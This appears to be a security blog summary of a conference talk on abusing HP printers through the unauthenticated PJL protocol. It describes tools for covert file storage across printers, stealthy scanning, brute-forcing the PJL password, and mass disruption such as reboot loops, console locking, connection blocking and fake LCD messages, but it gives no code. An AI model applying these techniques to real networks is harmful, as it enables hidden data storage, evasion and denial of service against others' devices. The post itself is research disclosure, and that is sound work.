Printers Gone Wild!
Ben Smith
Printers are everywhere… they are ubiquitous!
Everybody seems to ignore them. They get plugged in, and just work!
HP Basics
Listens on tcp/9100
Admin page on 80/443
Many have hard disks!
HP printers have 3 passwords
- Web admin
- Telnet (same as the wedadmin)
- PJLPassword
PJLPassword can be used to lockout the console, make disks read-only etc…
PJLPassword is weak… no brute-force protections
PJL is unathenticated and widely supported, going away, but will be here for a while.
SNMP can be disabled through the Web Admin, however encoding them specially they will still answer SNMP requests over port 9100
Google search “PJL DMINFO ASCIIHEX” for more info
Overview
PJL (Printer Job Langauge)
Sets up printer for jobs
Created by HP, used in many other devices
Really old!
Fun PJL commands
- FSUPLOAD (not an upload)
- FSDOWNLOAD (not a download)
- FSDIRLIST
- FSDELETE
- RDYMESSAGE
- DMINFO ASCIIHEX
There’s een lots of research before (Hijetter etc…)
Bringing that into the modern environment with printFS
printFS
Python tool for covert file systems using HP printers
Distributes files over multiple printers
Uses the printer RAM disks or physical disks
Works on any supported printer via network or the internet!
All stored files are compressed/encrypted and saved using random filenames
All files are stored twice with different names and keys to improve redundancy (files in RAM disk are lost on restart)
Supports panic mode (panic) remotely reboots every device in the file table to destroy the data
pfsScanner
multithreaded scanner
Scans printers to see if necessary commands are supported to use printFS
Scans are randomized in the order that functions are run and the timing between them
Test upload files are random data and given random names
Entire scan peppered with random sleeps
pyPJL
Main support lib
Used by all tools
Implements most of the documented PJL commands
printJack
A support tool for doing nasty funny things
User interface to the PJL password cracker
Mass control panel lock/unlock
Mass RamDisk/Disk Lock/Unlock
Pass printing (toner is cheap!)
pyPJLpass
Support class for printjack
Brute-forces all possible password combinations in about 2 hours (single thread)
So now it’s threaded to check multiple printers… all communicate together until one valid password is found (password reuse)
Other fun stuff to do to PJL
- Mass reboot loop
- Mass connect to port 9100 and remain connected (blocking)
- Animated LCD messages
- SE LCD messages (please call xxxxx)
- Mass disk lock
- Mass printing
- Mass control panel locking
Limitations
Can only upload files form the directory you are running printFS from
Known issue where some printers won’t respond to pfsScanner if they’re offline
To ensure that printers can still print when being scanned, dynamic class is used (generating huge traffic)
Code Release
Remote-exploit.org will receive it within the next week
Links:
- Shmoocon Schedule –> HERE
- Talk synopsis –> HERE
- HP PML faq –> HERE
Pingback: Week 4 In Review – 2011 | Infosec Events
Pingback: Hackertreffen: Sicherheitslücke Netzwerkdrucker | Flash News
old stuff
Talk at Defcon X ( 2003 !!!)
Sildes
http://www.phenoelit-us.org/stuff/defconX.pdf
Tool
http://www.phenoelit-us.org/hp/docu.html